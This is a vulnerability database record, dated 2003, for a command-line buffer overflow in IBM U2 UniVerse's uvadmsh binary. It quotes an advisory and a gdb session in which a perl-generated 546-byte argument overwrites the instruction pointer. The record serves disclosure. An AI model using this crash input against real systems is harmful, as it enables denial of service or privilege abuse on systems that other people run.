IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow
{"lastseen": "2020-04-01T19:04:20", "references": [], "description": "\nIBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow", "edition": 1, "reporter": "kf", "exploitpack": {"type": "dos", "platform": "unix"}, "published": "2003-07-16T00:00:00", "title": "IBM U2 UniVerse 10.0.0.9 - UVADMSH Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.7, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.7}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2003-07-16T00:00:00", "id": "EXPLOITPACK:CBE6E42CAFD14E5665A42E88EEE4871C", "href": "", "viewCount": 3, "sourceData": "source: https://www.securityfocus.com/bid/8209/info\n\nUnder certain configurations, UniVerse allows the 'uvadm' user to perform certain administration tasks for the software. It has been reported that the uvadmsh binary does not perform bounds checking when parsing command-line arguments. Because access to the vulnerable option is restricted to the uvadm user, other users may not be able to exploit this vulnerability.\n\nWhile this vulnerability was reported in UniVerse version 10.0.0.9, previous versions are likely vulnerable as well.\n\n(gdb) r -uv.install `perl -e 'print \"Z\" x 546'`\nStarting program: uvadmsh -uv.install `perl -e 'print \"Z\" x 546'`\nerror\n\nProgram received signal SIGSEGV, Segmentation fault.\n0x5a5a5a5a in ?? ()\n(gdb) bt\n#0 0x5a5a5a5a in ?? ()\nCannot access memory at address 0x5a5a5a5a", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645447721, "score": 1659814272}, "_internal": {"score_hash": "ac8b06a8d69cc93ae07764c748055822"}}